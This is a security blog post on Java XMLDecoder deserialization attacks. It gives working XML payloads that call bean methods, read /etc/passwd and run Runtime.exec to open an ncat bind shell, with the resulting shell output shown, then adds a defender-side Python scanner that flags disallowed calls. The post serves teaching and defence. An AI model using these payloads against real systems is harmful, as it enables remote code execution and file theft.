This type of research is not new; it is rather old, and I found only a few references about it (check the reference section). I thought it would be useful to add a little more explanation and detail about this type of attack, as it is poorly documented, and I had spent a considerable amount of time writing the various types of exploits beyond those I found online.
Exploiting this feature is relatively easy but tricky, as you need to be creative in writing the exploit in XML form. You can stop here for a moment and have a closer look at the JavaBeans Persistence XML Schema and how an object can be reconstructed, or a method called, using that schema:
https://www.oracle.com/technical-resources/articles/java/persistence3.html
Now, why did I mention ret2libc style? In some binary exploitation challenges we try to reach the functions of our interest by redirecting execution to them; sometimes, by calling system() and passing some arguments in our exploit, we can run system commands. Similarly, our attack vectors here will be based on using existing methods of the class that is currently being invoked, or methods of another class in a different package.
So here is the code under attack.
If we execute the code, this is the output generated in beaninxml.xml:
<?xml version="1.0" encoding="UTF-8"?>
<java version="1.8.0_265" class="java.beans.XMLDecoder">
<object class="MyBean"/>
</java>
Now, with the knowledge gained from reviewing the JavaBeans Persistence XML Schema, we will construct our payloads based on the above structure, which acts as a template for our attack vectors.
Case 1: Calling a member function of a Class
We will try to call the method display1() of the MyBean class. In our attacker-controlled XML file (exploit-base.txt) we add this code and execute:
<?xml version="1.0" encoding="UTF-8"?>
<java version="1.8.0_265" class="java.beans.XMLDecoder">
<object class="MyBean">
<void method="display1" />
</object>
</java>
Case 2: Calling a member function with an argument
Next we call display2() of MyBean, this time passing a string argument inside the <void> element:
<?xml version="1.0" encoding="UTF-8"?>
<java version="1.8.0_265" class="java.beans.XMLDecoder">
<object class="MyBean">
<void method="display2">
<string>I am passed via argument</string>
</void>
</object>
</java>
Case 3: Passing an object as an argument
In this example we will try to call readFile(File fileName) in MyBean. In our attacker-controlled XML file (exploit-base.txt) we add this code and execute. Here we abuse the readFile(File fileName) method to dump the contents of the /etc/passwd file. The method needs a File object, so we nest an <object class="java.io.File"> element whose constructor argument is the path string:
<?xml version="1.0" encoding="UTF-8"?>
<java version="1.8.0_265" class="java.beans.XMLDecoder">
<object class="MyBean">
<void method="readFile">
<object class="java.io.File">
<string>/etc/passwd</string>
</object>
</void>
</object>
</java>
Case 4: Calling a function of a different package
In this example we will try to call java.lang.Runtime.getRuntime().exec(String cmd). In our attacker-controlled XML file (exploit-base.txt) we add this code and execute. Here we get a bind shell on the victim's machine. Note that we are no longer using the object type (MyBean) from the base XML schema, so the decoded result cannot be cast back to MyBean. The attack still succeeds even though you encounter the error message below, because the exception is raised during the type conversion and the exploit has already been triggered before that point.
<?xml version="1.0" encoding="UTF-8" ?>
<java version="1.4.0" class="java.beans.XMLDecoder">
<object class="java.lang.Runtime" method="getRuntime">
<void method="exec">
<string>ncat -nlvp 3333 -e /bin/bash</string>
</void>
</object>
</java>
Output:
Exception in thread "main" java.lang.ClassCastException: java.lang.Runtime cannot be cast to MyBean
at DemoExample.fromXML(DemoExample.java:37)
at DemoExample.main(DemoExample.java:12)
Then we go to a command prompt and type:
nc 127.0.0.1 3333
id
uid=1000(websec) gid=1000(websec) ... ... ...
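As an added, defender-side example (not code from the original post), the following Python scanner walks the JavaBeans persistence grammar used in all four cases above (object, void, method, class and literal elements) and lists every constructor and method call a document would make XMLDecoder perform, flagging those outside an allowlist of (class, method) pairs. The sample documents are constructed from the post's cases, with the Case 4 command replaced by a harmless "id"; the allowlist entry ("MyBean", "setName") is a hypothetical setter, standing in for whatever property setters a real application's persistence files legitimately contain.

```python
import xml.etree.ElementTree as ET

# Constructed sample documents that mirror the post's template and its cases
# (the command in the last one is replaced by a harmless "id").
TEMPLATE = """<?xml version="1.0" encoding="UTF-8"?>
<java version="1.8.0_265" class="java.beans.XMLDecoder">
<object class="MyBean"/>
</java>"""

CASE1 = """<?xml version="1.0" encoding="UTF-8"?>
<java version="1.8.0_265" class="java.beans.XMLDecoder">
<object class="MyBean">
<void method="display1" />
</object>
</java>"""

CASE3 = """<?xml version="1.0" encoding="UTF-8"?>
<java version="1.8.0_265" class="java.beans.XMLDecoder">
<object class="MyBean">
<void method="readFile">
<object class="java.io.File">
<string>/etc/passwd</string>
</object>
</void>
</object>
</java>"""

CASE4 = """<?xml version="1.0" encoding="UTF-8"?>
<java version="1.4.0" class="java.beans.XMLDecoder">
<object class="java.lang.Runtime" method="getRuntime">
<void method="exec">
<string>id</string>
</void>
</object>
</java>"""

# Hypothetical allowlist: the only (class, method) pairs the application's own
# persistence files are expected to contain. "<init>" stands for the constructor.
ALLOWED = {("MyBean", "<init>"), ("MyBean", "setName")}


def _walk(el, owner, calls):
    """Record every constructor/method call an <object> or <void> node expresses.

    Returns a textual rendering of the node's value so it can be shown as an
    argument of its parent. Literal leaves (<string>, <int>, ...) return their text.
    Array/index forms of the grammar are not modelled here.
    """
    if el.tag == "object":
        cls = el.get("class", "?")
        # A method attribute on <object> is a static factory call (e.g. getRuntime);
        # without it the decoder invokes the class's constructor.
        method = el.get("method", "<init>")
        args = [_walk(c, cls, calls) for c in el if c.tag != "void"]
        calls.append((cls, method, args))
        # <void> children are method calls on the object just produced.
        for c in el:
            if c.tag == "void":
                _walk(c, cls, calls)
        return f"{cls}.{method}({', '.join(args)})"
    if el.tag == "void":
        # <void method="x"> calls x; <void property="p"> calls the setter setP.
        method = el.get("method") or "set" + el.get("property", "").capitalize()
        args = [_walk(c, owner, calls) for c in el if c.tag != "void"]
        calls.append((owner, method, args))
        return ""
    return (el.text or "").strip()


def extract_calls(xml_text):
    """Return [(class, method, [args])] in the order XMLDecoder would execute them."""
    # The stdlib parser is used for brevity; on untrusted input prefer defusedxml so
    # that entity-expansion documents are rejected before this walk runs.
    root = ET.fromstring(xml_text)
    if root.tag != "java" or root.get("class") != "java.beans.XMLDecoder":
        return []
    calls = []
    for child in root:
        _walk(child, None, calls)
    return calls


def assess(xml_text, allowed=ALLOWED):
    """Render every call outside the allowlist; an empty list means plain bean state."""
    return [f"{cls}.{method}({', '.join(args)})"
            for cls, method, args in extract_calls(xml_text)
            if (cls, method) not in allowed]


if __name__ == "__main__":
    for name, doc in [("template", TEMPLATE), ("case1", CASE1),
                      ("case3", CASE3), ("case4", CASE4)]:
        print(name, "->", assess(doc) or "no findings")
```

The template passes with no findings, while each case surfaces the call it smuggles in (display1, the java.io.File constructor plus readFile, or getRuntime followed by exec). The scanner is useful for triaging uploaded or logged documents; it is not a substitute for the real fix, which is to never hand attacker-controlled XML to XMLDecoder at all, since any method reachable through the grammar is callable.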
Well, that's it. I learnt a lot of things while doing this and I hope it will be useful to someone someday :)
References
- https://web.archive.org/web/20131016234737/http://blog.diniscruz.com/2013/08/using-xmldecoder-to-execute-server-side.html
- https://stackoverflow.com/questions/14307442/is-it-safe-to-use-xmldecoder-to-read-document-files
- https://github.com/o2platform/DefCon_RESTing/tree/c77474f2d063973c265f5b265af63fd3c5de44cc/Demos/XMLDecoderVuln/src/com/company
- https://github.com/pwntester/XMLDecoder